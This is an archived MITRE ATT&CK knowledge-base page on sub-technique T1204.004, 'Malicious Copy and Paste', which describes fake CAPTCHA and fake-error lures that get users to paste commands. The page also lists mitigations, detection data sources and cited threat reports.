User Execution: Malicious Copy and Paste, Sub-technique T1204.004 - Enterprise | MITRE ATT&CK®

User Execution: Malicious Copy and Paste, Sub-technique T1204.004 - Enterprise | MITRE ATT&CK®
Currently viewing
ATT&CK v17.1
which was live between April 22, 2025 and October 27, 2025.
Learn more about the versioning system
or
see the live site
Techniques
Enterprise
User Execution
Malicious Copy and Paste
User Execution:
Malicious Copy and Paste
Other sub-techniques of User Execution (4)
ID
Name
T1204.001
Malicious Link
T1204.002
Malicious File
T1204.003
Malicious Image
T1204.004
Malicious Copy and Paste
An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a
Command and Scripting Interpreter
Malicious websites, such as those used in
Drive-by Compromise
, may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.
[1]
[2]
[3]
[4]
Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.
[5]
[6]
Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
ID:
T1204.004
Sub-technique of:
T1204
Tactic:
Execution
Platforms:
Linux, Windows, macOS
Contributors:
Ale Houspanossian; Fernando Bacchin; Gabriel Currie; Harikrishnan Muthu, Cyble; Menachem Goldstein; ReliaQuest; SeungYoul Yoo, Ahn Lab
Version:
1.0
Created:
18 March 2025
Last Modified:
30 April 2025
Version Permalink
Live Version
Mitigations
ID
Mitigation
Description
M1038
Execution Prevention
Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g.,
Add-Type
).
[7]
M1031
Network Intrusion Prevention
If a link is being requested by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.
M1021
Restrict Web-Based Content
If a link is being requested by a user, block unknown or unused files in transit by default that should not be downloaded or by policy from suspicious sites as a best practice to prevent some vectors, such as
.scr
.exe
.pif
.cpl
, etc.
Detection
ID
Data Source
Data Component
Detects
DS0017
Command
Command Execution
Detect commands triggered by users that may download malicious files. Items typed into the Windows Run dialog are saved for each user in the
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Registry key.
[8]
DS0022
File
File Creation
Monitor for files created on a system after a user executes an unusual command. Look for common download paths and suspicious files with executable extensions.
DS0029
Network Traffic
Network Connection Creation
Monitor network traffic patterns associated with user actions, such as initiating connections to suspicious sites.
Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to malicious actors). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments.
DS0009
Process
Process Creation
Identify processes spawned by user actions that could lead to malicious execution.
References
CloudSEK TRIAD. (2024, September 19). Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages. Retrieved March 18, 2025.
Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.
Alex Capraro. (2024, December 17). Using CAPTCHA for Compromise: Hackers Flip the Script. Retrieved March 18, 2025.
AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.
Tommy Madjar, Selena Larson and The Proofpoint Threat Research Team. (2024, November 18). Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape. Retrieved March 18, 2025.
AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.
PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.
Shlomi Boutnaru. (2024, January 1). The Windows Forensics Journey — Run MRU (Run Dialog Box Most Recently Used). Retrieved April 14, 2025.